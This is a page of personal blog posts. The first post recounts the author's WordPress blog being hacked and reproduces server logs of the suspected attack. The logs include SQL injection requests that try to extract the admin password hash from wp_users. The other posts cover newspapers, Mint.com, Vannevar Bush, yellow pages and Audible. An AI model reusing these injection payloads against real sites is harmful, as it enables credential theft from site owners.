Hacked!

Last week, this blog was hacked. As far as hacks go, it was pretty minor: traffic coming from search engines was redirected to a spammy search engine (your-needs.info) with the query from the Referer header being passed along. Traffic from other links apparently didn’t get redirected.

The hack is described at the wordpress forums and appears to be spreading.

I’ve been running an ancient version of Wordpress and had meant to upgrade, but it never seemed urgent; hopefully, I’ve learned that lesson. While upgrading, I decided to upgrade from the default Wordpress 1.X theme I was using to this very nice Classy theme by Benedikt Rieke-Benninghaus, though I’ve already started tweaking it.

Thanks to Mike Hochster for telling me that my blog was broken and Brian White for pointing me at easy instructions for keeping Wordpress up to date.

For the curious, I suspect the attack corresponded to one of the following log entries:

84.244.147.70 - - [27/May/2008:21:29:19 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
84.244.147.70 - - [27/May/2008:21:29:44 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
84.244.147.70 - - [27/May/2008:21:29:44 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
84.244.147.70 - - [27/May/2008:21:29:44 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
84.244.147.70 - - [27/May/2008:21:29:44 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
84.244.147.70 - - [27/May/2008:21:29:44 -0400] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 398 “-” “-”
87.118.112.44 - - [27/May/2008:21:35:34 -0400] “HEAD /wp-admin/ HTTP/1.1″ 302 916 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:34 -0400] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 782 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:35 -0400] “POST /wp-admin/admin-ajax.php HTTP/1.1″ 404 391 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:35 -0400] “GET /xmlrpc.php HTTP/1.1″ 200 209 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:35 -0400] “POST /xmlrpc.php HTTP/1.1″ 200 941 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:36 -0400] “POST /wp-trackback.php?tb_id=1 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:36 -0400] “GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1″ 200 8256 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:37 -0400] “GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1″ 200 8256 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:37 -0400] “GET /wp-trackback.php?p=1 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:38 -0400] “GET /wp-trackback.php?p=2 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:38 -0400] “GET /wp-trackback.php?p=3 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:38 -0400] “GET /wp-trackback.php?p=4 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:39 -0400] “GET /wp-trackback.php?p=5 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:39 -0400] “GET /wp-trackback.php?p=6 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:39 -0400] “GET /wp-trackback.php?p=7 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:40 -0400] “GET /wp-trackback.php?p=8 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:41 -0400] “GET /wp-trackback.php?p=9 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:41 -0400] “GET /wp-trackback.php?p=10 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:42 -0400] “GET /wp-trackback.php?p=11 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:42 -0400] “GET /wp-trackback.php?p=12 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:42 -0400] “GET /wp-trackback.php?p=13 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:43 -0400] “GET /wp-trackback.php?p=14 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:43 -0400] “GET /wp-trackback.php?p=15 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:43 -0400] “GET /wp-trackback.php?p=16 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:44 -0400] “GET /wp-trackback.php?p=17 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:44 -0400] “GET /wp-trackback.php?p=18 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:44 -0400] “GET /wp-trackback.php?p=19 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:45 -0400] “GET /wp-trackback.php?p=20 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:45 -0400] “GET /wp-trackback.php?p=21 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:45 -0400] “GET /wp-trackback.php?p=22 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:46 -0400] “GET /wp-trackback.php?p=23 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:46 -0400] “GET /wp-trackback.php?p=24 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:46 -0400] “GET /wp-trackback.php?p=25 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”
87.118.112.44 - - [27/May/2008:21:35:47 -0400] “POST /wp-trackback.php?p=1 HTTP/1.1″ 200 265 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)”

1 June 2008Blogging, Web 0 Comments »

An Editorial Voice

Adolph S. Ochs, New-York, Aug. 18, 1896:

To undertake the management of The New-York Times, with its great history for right doing, and to attempt to keep bright the lustre which Henry J. Raymond and George Jones have given it is an extraordinary task. But if a sincere desire to conduct a high-standard newspaper, clean, dignified, and trustworthy, requires honesty, watchfulness, earnestness, industry, and practical knowledge applied with common sense, I entertain the hope that I can succeed in maintaining the high estimate that thoughtful, pure-minded people have ever had of The New-York Times.

It will be my earnest aim that The New-York Times give the news, all the news, in concise and attractive form, in language that is parliamentary in good society, and give it as early, if not earlier, than it can be learned through any other reliable medium; to give the news impartially, without fear or favor, regardless of party, sect, or interests involved; to make of the columns of The New-York Times a forum for the consideration of all questions of public importance, and to that end to invite intelligent discussion from all shades of opinion.

There will be no radical changes in the personnel of the present efficient staff. Mr. Charles R. Miller, who has so ably for many years presided over the editorial pages, will continue to be the editor; nor will there be a departure from the general tone and character and policies pursued with relation to public questions that have distinguished The New-York Times as a non-partisan newspaper — unless it be, if possible, to intensify its devotion to the cause of sound money and tariff reform, opposition to wastefulness and peculation in administering public affairs, and in its advocacy of the lowest tax consistent with good government, and no more government than is absolutely necessary to protect society, maintain individual and vested rights, and assure the free exercise of a sound conscience.

See more in History of the New York Times, 1851-1921 and and Discovering the News: A Social History of American Newspapers.

5 January 2008Search, Web 0 Comments »

Coulda, woulda, shoulda … but not really

First of all, congrats over to the team at Mint.com for going live and winning the Techcrunch40 prize. As a die hard Quicken user, I think it’s great that companies are pushing in this space. I can’t say I save money or time by using Quicken, but it lets me feel in control. (And I could always tell when I wasn’t feeling in control of my finances, because I would avoid Quicken.) I wish Mint much luck.

But I’m also left with a slightly nostalgic feeling — and even a bit of jealousy — because I tried to create a similar venture back in late 1999. I was coming off of another startup (which I got wistful for when I first heard about Entise Systems and Azul Systems), all my friends were starting web companies, and I thought that what the world needed was a web-version of Quicken. At the time, everyone I talked to thought it was a crazy idea. People wouldn’t trust some web company with access to all their accounts. I was too late and the market was going to be owned by Yodlee or MyCFO. Only obsessives used Quicken and they were already satisfied.

I built a small prototype that could import my Quicken data. And I managed to disable my Bank of America and American Express accounts a few times while building screen scrapers for them. More importantly, though, I learned a few lessons about startups (don’t try to do it as one person — you need moral support and someone to bounce ideas off of) and about myself (I’m good at technology but not at sales). And, after working on it for a few months, I realized I wasn’t actually interested in building and selling the product, only in using it. So, I closed it down and took a job at a startup some friends had founded, which then disappeared with most of the rest of Web 1.0.

I wonder if it’s still a crazy idea. I hope not. Mint, with their scraping and auto-categorization, seems to have done a nice job. I suspect I’m going to hold off on using Mint.com, because this is one kind of data I actually like to have sitting on my hard drive and not out in the cloud. At least for now.

20 September 2007Business, Web 0 Comments »

As He Did Think

I finally read Vannevar Bush’s essay As We May Think for the first time this week. For something written in 1945, it’s amazing; for that matter, if it had been written in 1975, it would have been just as amazing for its uncanny predictive power. He outlines something very close to the modern digital era. If you haven’t read it, you should.

Of course, it’s off on many details, comically so in some cases. His discussion of “dry photography” and the process of distributing books in microfilm form remind me of the pneumatic tubes of Brazil. With transistors still two years out, I guess “thermionic tubes” were the right technology to talk about; that they’re now used only by die-hard audiofiles might surprise him.

Where Bush falls short about technology is in not predicting the pervasiveness and connectedness that we have. Yes, scientists and researchers use modern day “Memexes,” but so do people looking for people, movies, restaurants, travel, trivia, porn, and a million other topics. The information in our memexes is distributed among a wider array of machines, all connected, giving a much larger field of information available to everyone. We also use the internet for forms of communication — blogs might have been predictable but eBay probably wasn’t — that I don’t think Bush envisioned.

Bush was better on technology than social trends. He didn’t foresee shifts in gender roles; these days, scientists type for themselves and “a whole roomful of girls armed with simple key board punches” are not transcribing the thoughts of great men. He predicted that books would be the unit of transfer, where the web “page” model is much finer grained. That almost all of us are still typing, rather than speaking for human- or machine-transcription, is an artifact of something else that I think is hard to predict: when we’ll adapt machines to our behavior and when we’ll adapt our behavior to what machines do easily.

But all that’s incidental to the astounding accomplishments of prediction in this essay. Search engines are trying to deliver on the potential of the Memex and he described information retrieval better than most people can today. The combination is digital photography and “radio” (or, as we think of it, “wireless”) is probably ahead of where he predicted and book digitization is almost there. His description of browsing and navigation make an interface of windows, scrollbars, and a pointing device (though not a “lever”) seem almost obvious.

(Props to The Atlantic for being true to the spirit of the essay by making it easily accessible.)

28 January 2006Search, Web 0 Comments »

At least the internet never turns into a pile of grey sludge on your doorstep

This is rainy season in San Francisco. It’s also, unfortunately, the time of year when Pacific Bell SBC at&t delivers new yellow pages.

I just about stopped using the yellow pages nearly a decade ago, long before I started working at a search engine and long before there was good integration of local information with general searches. Certainly by the time I had always-on internet access at home, I gave up using a printed yellow pages except in the rarest of cases. If the local business has a website — almost always true for a restaurant, for example — and you can find it, the web is great. If it doesn’t, the presence of online yellow pages means you’ll at least get the basic contact information and, in some categories, third party reviews and discussion.

On the other hand, I have at least one friend who swears by the physical yellow pages these days. He loves how easy it is to find the big, credible players, because they buy display ads. And those big ads contain lots of information, often including open hours, manufacturers whose products the store carries, a map, and details that might give you a feel for the business. Exactly what you’d hope to find on a website.

Many of those display ads are placed by local businesses that don’t have a website. For example, one of our local hardware stores (Tuggey’s on 24th) has no website and the other (Cliff’s Variety on Castro) appears to have added a website only in the past few weeks. (Go, Cliff’s!)

So, when this year’s yellow pages turned to a pile of liquidy grey sludge after a couple of hours of waiting for us on the front steps, I wasn’t particularly disappointed. What surprises me is the people who would still be disappointed. And more surprising are the merchants who spend a significant amount of money to reach those people, but don’t even attempt to reach people like me.

2 January 2006San Francisco, Search, Web 0 Comments »

Why is Audible.com so unpleasant to use?

Given my long commute, I swear by audiobooks. I used to borrow books on tape from my library, but for a little more than year I’ve been a customer of Audible.com and download books. While no service is comprehensive, Audible does have a very good collection of books.

Audible’s site, however, has always been terrible to use. This makes no sense: they’re a web-only business, so they should have put some effort into their site. But the navigation was always difficult, downloading was awkward, and, most importantly, the site was always too slow. Fine, the downloads take a long time, but navigating the site should be quick and zippy. (Here’s a hint, folks: put the big downloads on a separate pipe from your home page.)

Audible recently changed their fee structure (a little more money, but credits roll over from month to month — probably a good thing) and, at the same time, redesigned the site. I’m not going to comment on the new green-on-green look, but the substance of the redesign has two good changes and a few bad ones.

Good change #1 is that downloading is much more straightforward and is now set up for downloading multiple files at a time. Good change #2 is that they no longer make use of broken JavaScript for every link, so that middle-button-click now opens pages in new tabs for me.

The bad part is that navigation seems even worse than before. Each page used to have genre and category links in a sidebar and a search box in the upper right; both are now gone, replaced by, respectively, a tips box that always seems to say “Great choice! You spent money with us!” (my paraphrasing) and a viewer for the current contents of your shopping care, which seems useless for those loyal subscribers who tend to pick one audiobook at a time, as their plan allows.

Unfortunately, the site, if anything, is slower than it was before. So slow that images time out all the time, breaking their fragile HTML layout in odd ways. So slow that one of every ten of my page views ends up with a “couldn’t contact server audible.com” message. So slow that I find myself needing to do other things (like write flames about Audible) while I try to navigate their site. Sigh.

It’s not as if there’s not good examples of online bookstores…

While I’m grumbling about Audible, why do they give the same filename to all the parts of the same book? For example, I just downloaded Zadie Smith’s On Beauty. It comes in three parts. Why are all three files, when I down load them to my Mac, named “OnBeautyUnabridgedPa_mp332.aa“? I assume the “Pa” is a vestigial reference to “part 2,” but why doesn’t that get precedence over “Unabridged” or “mp332″ — both of which, from my perspective, are boilerplate.

1 January 2006Web 0 Comments »